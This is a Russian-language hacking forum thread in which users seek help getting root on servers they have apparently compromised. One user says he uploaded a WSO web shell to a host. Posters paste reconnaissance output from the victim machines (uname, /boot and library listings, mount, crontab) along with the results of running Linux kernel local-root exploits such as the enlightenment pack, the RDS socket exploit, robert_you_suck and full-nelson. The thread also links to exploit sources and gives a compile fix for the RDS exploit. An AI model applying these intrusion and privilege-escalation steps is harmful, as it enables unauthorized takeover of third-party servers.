http://i061.radikal.ru/1110/a0/63c8568af92c.jpg

Права на/var/server_monitor -> drwxr-xr-x

Права на /var/server_monitor/summary.daily.php -> -rw-r--r--

По поводу первого сплоита вот прочитай: https://rdot.org/forum/showthread.php?t=820

Там в посте #9 можно скачать уже скопиленный сплоит, попробуй.

И в посте #6 указано как изменить сплоит, чтобы компилировался. Попробуй оба варианта.

По поводу крона:

А владелец файла, случайно так, не тот юзер под которым ты? Хотя вероятность крайне мала

У тебя ядро просто ноябрь 2010г, это считай 2011г, тут мало шансов чем-то ядерным пробить.

1.ping6 - тот же вывод...

2.Естессссно, даже несколько раз вводил id

3.пробовал, вывод, как у большинства эксплоитов :

как при подключении-

sh:no job control in this shell

4. точно не помню, а врать не буду

по моему: 3 - ребут, 4 - просак....

тоже:

sh:no job control in this shell

а ты после сообщения no job control in this shell пробовал вывести команду id или whoami?

иногда наченаешь чувствовать себя идиотом, ведь проверил "на всякий случай"!

немного офтоп, прошу прощения....

Пишет ошибкуCould not open socket

Погуглил, ничего не нашел, под это что-нибудь есть?

er9j6@, Apr 20 22:10:33 UTC 2011 ничем не пробить пока что.

$ uname -a

Linux line6 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64 GNU/Linux

$ ls -la /boot

total 32908

drwxr-xr-x 3 root root 4096 Oct 2 05:11 .

drwxr-xr-x 25 root root 4096 Sep 17 23:34 ..

-rw-r--r-- 1 root root 1225451 Mar 13 2009 System.map-2.6.26-1-amd64

-rw-r--r-- 1 root root 1227280 Sep 20 23:04 System.map-2.6.26-2-amd64

-rw-r--r-- 1 root root 85588 Mar 13 2009 config-2.6.26-1-amd64

-rw-r--r-- 1 root root 85694 Sep 20 23:04 config-2.6.26-2-amd64

drwxr-xr-x 2 root root 4096 Oct 2 05:11 grub

-rw-r--r-- 1 root root 6928695 Apr 29 2010 initrd.img-2.6.26-1-amd64

-rw-r--r-- 1 root root 6651999 Mar 5 2009 initrd.img-2.6.26-1-amd64.bak

-rw-r--r-- 1 root root 6941167 Oct 2 05:11 initrd.img-2.6.26-2-amd64

-rw-r--r-- 1 root root 6936102 Apr 29 2010 initrd.img-2.6.26-2-amd64.bak

-rw-r--r-- 1 root root 1755120 Mar 13 2009 vmlinuz-2.6.26-1-amd64

-rw-r--r-- 1 root root 1756944 Sep 20 23:02 vmlinuz-2.6.26-2-amd64\

$ ls -la --full-time /lib/lib*

-rw-r--r-- 1 root root 6176 2011-01-07 13:33:04.000000000 -0800 /lib/libBrokenLocale-2.7.so

lrwxrwxrwx 1 root root 22 2011-01-12 02:19:38.000000000 -0800 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.7.so

-rw-r--r-- 1 root root 18600 2011-01-07 13:33:04.000000000 -0800 /lib/libSegFault.so

lrwxrwxrwx 1 root root 15 2010-06-03 09:54:24.000000000 -0700 /lib/libacl.so.1 -> libacl.so.1.1.0

-rw-r--r-- 1 root root 29360 2008-04-23 14:01:34.000000000 -0700 /lib/libacl.so.1.1.0

-rw-r--r-- 1 root root 14832 2011-01-07 13:33:04.000000000 -0800 /lib/libanl-2.7.so

lrwxrwxrwx 1 root root 13 2011-01-12 02:19:38.000000000 -0800 /lib/libanl.so.1 -> libanl-2.7.so

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libattr.so.1 -> libattr.so.1.1.0

-rw-r--r-- 1 root root 17424 2009-02-10 01:47:21.000000000 -0800 /lib/libattr.so.1.1.0

lrwxrwxrwx 1 root root 15 2010-06-03 09:54:24.000000000 -0700 /lib/libblkid.so.1 -> libblkid.so.1.0

-rw-r--r-- 1 root root 46608 2008-10-12 20:54:02.000000000 -0700 /lib/libblkid.so.1.0

lrwxrwxrwx 1 root root 15 2010-09-21 03:02:04.000000000 -0700 /lib/libbz2.so.1 -> libbz2.so.1.0.4

lrwxrwxrwx 1 root root 15 2010-09-21 03:02:04.000000000 -0700 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4

-rw-r--r-- 1 root root 66224 2010-08-18 10:44:47.000000000 -0700 /lib/libbz2.so.1.0.4

-rwxr-xr-x 1 root root 1375536 2011-01-07 13:33:04.000000000 -0800 /lib/libc-2.7.so

lrwxrwxrwx 1 root root 11 2011-01-12 02:19:38.000000000 -0800 /lib/libc.so.6 -> libc-2.7.so

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libcap.so.1 -> libcap.so.1.10

-rw-r--r-- 1 root root 14880 2006-03-16 03:56:29.000000000 -0800 /lib/libcap.so.1.10

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libcap.so.2 -> libcap.so.2.11

-rw-r--r-- 1 root root 16976 2008-07-26 08:52:16.000000000 -0700 /lib/libcap.so.2.11

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libcfont.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 12776 2008-04-15 14:40:42.000000000 -0700 /lib/libcfont.so.0.0.0

-rw-r--r-- 1 root root 190760 2011-01-07 13:33:04.000000000 -0800 /lib/libcidn-2.7.so

lrwxrwxrwx 1 root root 14 2011-01-12 02:19:38.000000000 -0800 /lib/libcidn.so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 11648 2008-10-12 20:54:02.000000000 -0700 /lib/libcom_err.so.2.1

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libconsole.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 140840 2008-04-15 14:40:42.000000000 -0700 /lib/libconsole.so.0.0.0

-rw-r--r-- 1 root root 39112 2011-01-07 13:33:04.000000000 -0800 /lib/libcrypt-2.7.so

lrwxrwxrwx 1 root root 15 2011-01-12 02:19:38.000000000 -0800 /lib/libcrypt.so.1 -> libcrypt-2.7.so

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libctutils.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 21024 2008-04-15 14:40:42.000000000 -0700 /lib/libctutils.so.0.0.0

-rw-r--r-- 1 root root 98840 2008-10-01 07:33:16.000000000 -0700 /lib/libdevmapper.so.1.02.1

-rw-r--r-- 1 root root 14616 2011-01-07 13:33:04.000000000 -0800 /lib/libdl-2.7.so

lrwxrwxrwx 1 root root 12 2011-01-12 02:19:38.000000000 -0800 /lib/libdl.so.2 -> libdl-2.7.so

lrwxrwxrwx 1 root root 13 2010-06-03 09:54:24.000000000 -0700 /lib/libe2p.so.2 -> libe2p.so.2.3

-rw-r--r-- 1 root root 25424 2008-10-12 20:54:02.000000000 -0700 /lib/libe2p.so.2.3

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libext2fs.so.2 -> libext2fs.so.2.4

-rw-r--r-- 1 root root 187416 2008-10-12 20:54:02.000000000 -0700 /lib/libext2fs.so.2.4

-rw-r--r-- 1 root root 93016 2009-01-02 03:14:18.000000000 -0800 /lib/libgcc_s.so.1

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libhistory.so.5 -> libhistory.so.5.2

-rw-r--r-- 1 root root 32968 2009-01-14 03:19:12.000000000 -0800 /lib/libhistory.so.5.2

-rw-r--r-- 1 root root 32016 2008-07-12 15:07:47.000000000 -0700 /lib/libiw.so.29

-rw-r--r-- 1 root root 7736 2008-09-01 04:59:38.000000000 -0700 /lib/libkeyutils-1.2.so

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so

-rw-r--r-- 1 root root 534736 2011-01-07 13:33:04.000000000 -0800 /lib/libm-2.7.so

lrwxrwxrwx 1 root root 11 2011-01-12 02:19:38.000000000 -0800 /lib/libm.so.6 -> libm-2.7.so

-rw-r--r-- 1 root root 18592 2011-01-07 13:33:04.000000000 -0800 /lib/libmemusage.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libncurses.so.5 -> libncurses.so.5.7

-rw-r--r-- 1 root root 256288 2008-12-14 13:31:27.000000000 -0800 /lib/libncurses.so.5.7

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libncursesw.so.5 -> libncursesw.so.5.7

-rw-r--r-- 1 root root 305952 2008-12-14 13:31:28.000000000 -0800 /lib/libncursesw.so.5.7

-rw-r--r-- 1 root root 88968 2011-01-07 13:33:04.000000000 -0800 /lib/libnsl-2.7.so

lrwxrwxrwx 1 root root 13 2011-01-12 02:19:38.000000000 -0800 /lib/libnsl.so.1 -> libnsl-2.7.so

-rw-r--r-- 1 root root 31536 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_compat-2.7.so

lrwxrwxrwx 1 root root 20 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_compat.so.2 -> libnss_compat-2.7.so

-rw-r--r-- 1 root root 18752 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_dns-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_dns.so.2 -> libnss_dns-2.7.so

-rw-r--r-- 1 root root 47520 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_files-2.7.so

lrwxrwxrwx 1 root root 19 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_files.so.2 -> libnss_files-2.7.so

-rw-r--r-- 1 root root 18784 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_hesiod-2.7.so

lrwxrwxrwx 1 root root 20 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.7.so

-rw-r--r-- 1 root root 43472 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_nis-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_nis.so.2 -> libnss_nis-2.7.so

-rw-r--r-- 1 root root 51616 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_nisplus-2.7.so

lrwxrwxrwx 1 root root 21 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.7.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libpam.so.0 -> libpam.so.0.81.12

-rw-r--r-- 1 root root 46256 2009-03-24 02:08:13.000000000 -0700 /lib/libpam.so.0.81.12

lrwxrwxrwx 1 root root 21 2010-06-03 09:54:24.000000000 -0700 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.3

-rw-r--r-- 1 root root 10920 2009-03-24 02:08:13.000000000 -0700 /lib/libpam_misc.so.0.81.3

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libpamc.so.0 -> libpamc.so.0.81.0

-rw-r--r-- 1 root root 11464 2009-03-24 02:08:13.000000000 -0700 /lib/libpamc.so.0.81.0

lrwxrwxrwx 1 root root 23 2010-06-03 09:54:24.000000000 -0700 /lib/libparted-1.8.so.10 -> libparted-1.8.so.10.0.0

-rw-r--r-- 1 root root 389040 2008-11-23 18:28:09.000000000 -0800 /lib/libparted-1.8.so.10.0.0

-rw-r--r-- 1 root root 6192 2011-01-07 13:33:04.000000000 -0800 /lib/libpcprofile.so

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libpopt.so.0 -> libpopt.so.0.0.0

-rw-r--r-- 1 root root 37712 2008-06-25 04:06:15.000000000 -0700 /lib/libpopt.so.0.0.0

-rw-r--r-- 1 root root 68064 2009-01-11 14:08:40.000000000 -0800 /lib/libproc-3.2.7.so

-rwxr-xr-x 1 root root 130114 2011-01-07 13:33:04.000000000 -0800 /lib/libpthread-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libpthread.so.0 -> libpthread-2.7.so

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libreadline.so.5 -> libreadline.so.5.2

-rw-r--r-- 1 root root 258616 2009-01-14 03:19:12.000000000 -0800 /lib/libreadline.so.5.2

-rw-r--r-- 1 root root 72568 2011-01-07 13:33:04.000000000 -0800 /lib/libresolv-2.7.so

lrwxrwxrwx 1 root root 16 2011-01-12 02:19:38.000000000 -0800 /lib/libresolv.so.2 -> libresolv-2.7.so

-rw-r--r-- 1 root root 35784 2011-01-07 13:33:04.000000000 -0800 /lib/librt-2.7.so

lrwxrwxrwx 1 root root 12 2011-01-12 02:19:38.000000000 -0800 /lib/librt.so.1 -> librt-2.7.so

-rw-r--r-- 1 root root 109464 2008-09-16 00:22:47.000000000 -0700 /lib/libselinux.so.1

-rw-r--r-- 1 root root 187136 2009-01-05 15:06:30.000000000 -0800 /lib/libsemanage.so.1

-rw-r--r-- 1 root root 237168 2008-07-12 07:29:13.000000000 -0700 /lib/libsepol.so.1

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libslang.so.2 -> libslang.so.2.1.3

-rw-r--r-- 1 root root 952736 2008-03-17 12:22:37.000000000 -0700 /lib/libslang.so.2.1.3

lrwxrwxrwx 1 root root 12 2010-06-03 09:54:24.000000000 -0700 /lib/libss.so.2 -> libss.so.2.0

-rw-r--r-- 1 root root 24416 2008-10-12 20:54:02.000000000 -0700 /lib/libss.so.2.0

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1

-rw-r--r-- 1 root root 43920 2008-09-06 02:26:29.000000000 -0700 /lib/libsysfs.so.2.0.1

-rw-r--r-- 1 root root 31376 2011-01-07 13:33:04.000000000 -0800 /lib/libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2011-01-12 02:19:38.000000000 -0800 /lib/libthread_db.so.1 -> libthread_db-1.0.so

lrwxrwxrwx 1 root root 13 2010-06-03 09:54:24.000000000 -0700 /lib/libtic.so.5 -> libtic.so.5.7

-rw-r--r-- 1 root root 77328 2008-12-14 13:31:27.000000000 -0800 /lib/libtic.so.5.7

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libticw.so.5 -> libticw.so.5.7

-rw-r--r-- 1 root root 77328 2008-12-14 13:31:28.000000000 -0800 /lib/libticw.so.5.7

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 32608 2008-09-05 03:18:53.000000000 -0700 /lib/libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 10560 2011-01-07 13:33:04.000000000 -0800 /lib/libutil-2.7.so

lrwxrwxrwx 1 root root 14 2011-01-12 02:19:38.000000000 -0800 /lib/libutil.so.1 -> libutil-2.7.so

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libuuid.so.1 -> libuuid.so.1.2

-rw-r--r-- 1 root root 15344 2008-10-12 20:54:02.000000000 -0700 /lib/libuuid.so.1.2

lrwxrwxrwx 1 root root 22 2010-06-03 09:54:24.000000000 -0700 /lib/libvolume_id.so.0 -> libvolume_id.so.0.85.0

-rw-r--r-- 1 root root 33368 2009-08-26 03:27:16.000000000 -0700 /lib/libvolume_id.so.0.85.0

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libwrap.so.0 -> libwrap.so.0.7.6

-rw-r--r-- 1 root root 36208 2008-07-25 17:05:10.000000000 -0700 /lib/libwrap.so.0.7.6

-rw-r--r-- 1 root root 137000 2008-06-26 08:51:57.000000000 -0700 /lib/libx86.so.1

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libxtables.so.0 -> libxtables.so.0.0.0

-rw-r--r-- 1 root root 23392 2009-02-09 11:35:51.000000000 -0800 /lib/libxtables.so.0.0.0

$ mount

/dev/sda1 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

/dev/sda2 on /tmp type ext3 (rw,noexec,noatime,nodiratime,data=ordered,commit= 300)

/dev/sdb1 on /home type ext3 (rw,nosuid,nodev,noatime,nodiratime,errors=remount-ro,data=ordered)

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda1 28G 12G 15G 46% /

tmpfs 7.9G 0 7.9G 0% /lib/init/rw

tmpfs 7.9G 0 7.9G 0% /dev/shm

/dev/sda2 7.4G 339M 6.7G 5% /tmp

/dev/sdb1 3.6T 2.9T 720G 80% /home

$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

#

$ cat /proc/version

Linux version 2.6.32.8-grsec-2.1.14-modsign-xeon-64 (root@womb) (gcc version 4.3.2 (Debian 4.3.2-1.1) ) #2 SMP Sat Mar 13 00:42:43 PST 2010

sh-3.2$ cat /proc/sys/vm/mmap_min_addr

cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

Пробовал enlightenment. Вот что получается:

sh-3.2$ ./run_null_exploits.sh

Compiling exp_cheddarbay.c...OK.

Compiling exp_ingom0wnar.c...OK.

Compiling exp_moosecox.c...OK.

Compiling exp_paokara.c...OK.

Compiling exp_powerglove.c...OK.

Compiling exp_sieve.c...OK.

Compiling exp_therebel.c...OK.

Compiling exp_vmware.c...failed.

Compiling exp_wunderbar.c...OK.

UNABLE TO MAP ZERO PAGE!

Прошу помощи

zenon3

RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c

robert_you_suck: http://www.exploit-db.com/exploits/15023/

В принципе такое должно еще биться Ac1dB1tCh3z, но SynQ писал что Debian он не пробивает, т.ч. попробуй еще его модифицированный сплоит: https://rdot.org/forum/showthread.php?t=1597

Но все может обломаться из-за grsec, но не всегда он работает как надо. Если во всех сплоитах будут ошибки по типу что не смог получить символы, то grsec работает.

UPD:

Судя по этому листингу:

- grsec у тебя работает как раз таки нормально, ограничивая доступ к /proc.

Можно еще взять символы с /boot/System.map*, но запуская enlightenment на серваке 2010г, думаю что этот способ - не для тебя.

Ну из-за grsec можно даже не смотреть в сторону асидбитчес....

zenon3

Тут как вариант могут прокатить роберт ю сак или фул нельсон

Помогите разобраться нубу.

Пользовался данной темой - (/thread151993.html)

Вот залил я шелл (wso 2.5 modified) на хост, посмотрел -uname - FreeBSD 6.4-RELEASE, скачал данный эксплоит http://www.exploit-db.com/exploits/16951/ ,

у меня не выделенный ip - значит использую - промежуточный хост - вопрос - что такое промежуточный хост - это то-есть второй компьютер?

Второй вопрос - через что запускать эксплоит?

фулл нельсон не прокатил. роберт написал вот так:

sh-3.2$ ./rob

symbol table not available, aborting!

Process finished

RDS даже не скомпилировался. Написал:

sh-3.2$ gcc rds.c -o rds

rds.c: In function 'prep_sock':

rds.c:53: error: 'PF_RDS' undeclared (first use in this function)

rds.c:53: error: (Each undeclared identifier is reported only once

rds.c:53: error: for each function it appears in.)

Погуглил и нажел что надо прописать в исходник: #define AF_RDS 21

#define PF_RDS AF_RDS

Скомпилировал. Запустил:

sh-3.2$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Could not open socket.

sh-3.2$ Could not open socket

Получается RDS тоже не пробивает.

Ну так объясни пожалуйста что это за способ и почему он не для меня ? Посмотри PM.

zenon3

То о чем я и говорил. Сплоитам нужны символы из файла /proc/kallsyms. grsec ограничивает доступ к директории /proc (не всегда правда), сплоиты не могут получить символы для дальнейшей эксплуатации, поэтому и выводят такое.

А RDS у тебя просто не установлен на тачке.

Вот интересно кто все время подтирает мой пост в котором я пишу что я скинул шелл в ПМ тайгеру ? он явно не читает личные сообщения поэтому я написал тут.

2.6.32

uname -a

Linux apache 2.6.32-vs2.3.0.36.27-smp #2 SMP Sat Mar 27 19:11:22 CET 2010 i686

$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1570593 2008-11-21 08:33:31.000000000 +0100 /lib/libc-2.7.so

lrwxrwxrwx 1 root root 11 2009-12-24 11:41:48.000000000 +0100 /lib/libc.so.6 -> libc-2.7.so

-rwxr-xr-x 1 root root 190689 2008-11-21 08:33:31.000000000 +0100 /lib/libcidn-2.7.so

lrwxrwxrwx 1 root root 14 2009-12-24 11:41:47.000000000 +0100 /lib/libcidn.so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2009-12-24 11:41:47.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 5744 2007-01-25 05:25:50.000000000 +0100 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 42592 2008-11-21 08:33:31.000000000 +0100 /lib/libcrypt-2.7.so

lrwxrwxrwx 1 root root 15 2009-12-24 11:41:48.000000000 +0100 /lib/libcrypt.so.1 -> libcrypt-2.7.so

$ mount

/dev/hdv1 on / type ufs (defaults)

none on /proc type proc (defaults)

none on /tmp type tmpfs (size=400m,mode=1777)

none on /dev/pts type devpts (gid=5,mode=620)

/usr/local/vservers/users/home on /usr/local/www/htdocs/users type none (bind)

/usr/local/vservers/mysql/usr/local/mysql on /usr/local/mysql type none (bind,ro)

/usr/local/vservers/postgres/usr/local/postgresql on /usr/local/postgresql type none (bind,ro

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/hdv1 45G 26G 17G 60% /

none 400M 27M 374M 7% /tmp

я так понял это виртуалка ip 10.0.0.2

первый раз с этим сталкиваюсь

можно мне чем помочь?

спасибо

ls -la /boot

и попробуй glibc

boot пустой

glibc не кататит

я говорю там айпишник 10.0.0.2

whois'ом не пробивает

не пойму че за мини хост какой то

Это виртуалка. А то что айпи 10.0.0.2, это обозначает что он внутри сети, и доступ к нему осуществляется скорее всего через прокси сервер, или же он просто за натом.

Как получить root? Сам подобрать не смог.

/usr/bin/gcc

/usr/bin/c++

/usr/bin/netstat

$ uname -a

FreeBSD 6.3-STABLE FreeBSD 6.3-STABLE #6: Sat Dec 19 06:26:37 CET 2009 root@:/root/src/sys/i386/compile/ISPSYSTEM_PAE i386

$ ls -la /boot

total 1688

drwxr-xr-x 10 root wheel 512 Apr 22 10:31 .

drwxr-xr-x 36 root wheel 512 Apr 22 10:45 ..

-r--r--r-- 1 root wheel 7638 Jul 10 2008 beastie.4th

-r--r--r-- 1 root wheel 8192 Jul 10 2008 boot

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot0

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot0sio

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot1

-r--r--r-- 1 root wheel 7680 Jul 10 2008 boot2

-r--r--r-- 1 root wheel 1201 Jul 10 2008 cdboot

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 defaults

-r--r--r-- 1 root wheel 1741 Nov 3 2005 device.hints

-r--r--r-- 1 root wheel 2249 Jul 10 2008 frames.4th

-r--r--r-- 1 root wheel 7975 Jul 10 2008 gptboot

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 kernel

-r-xr-xr-x 1 root wheel 217088 Jul 10 2008 loader

-r--r--r-- 1 root wheel 7772 Jul 10 2008 loader.4th

-r--r--r-- 1 root wheel 15219 Jul 10 2008 loader.help

-r-xr-xr-x 1 root wheel 217088 Jan 21 2008 loader.old

-r--r--r-- 1 root wheel 389 Nov 3 2005 loader.rc

-r--r--r-- 1 root wheel 512 Jul 10 2008 mbr

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 modules

-r--r--r-- 1 root wheel 512 Jul 10 2008 pmbr

-r--r--r-- 1 root wheel 219136 Jul 10 2008 pxeboot

-r--r--r-- 1 root wheel 692 Jul 10 2008 screen.4th

-r--r--r-- 1 root wheel 36440 Jul 10 2008 support.4th

$ mount

/dev/vd0 on / (vdsfs, local, with quotas, noclusterw)

$ df -h

Filesystem Size Used Avail Capacity Mounted on

/dev/vd0 20G 2.7G 17G 14% /

$ cat /etc/crontab

# /etc/crontab - root's crontab for FreeBSD

#

# $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $

#

SHELL=/bin/sh

PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin

HOME=/var/log

#

#minute hour mday month wday who command

#

*/5 * * * * root /usr/libexec/atrun

#

# Save some entropy so that /dev/random can re-seed on boot.

*/11 * * * * operator /usr/libexec/save-entropy

#

# Rotate log files every hour, if necessary.

0 * * * * root newsyslog

#

# Perform daily/weekly/monthly maintenance.

1 3 * * * root periodic daily

15 4 * * 6 root periodic weekly

30 5 1 * * root periodic monthly

#

# Adjust the time zone if the CMOS clock keeps local time, as opposed to

# UTC time. See adjkerntz(8) for details.

#1,31 0-5 * * * root adjkerntz -a

$ pwd

/home/uchet/data/www/kye.ru/img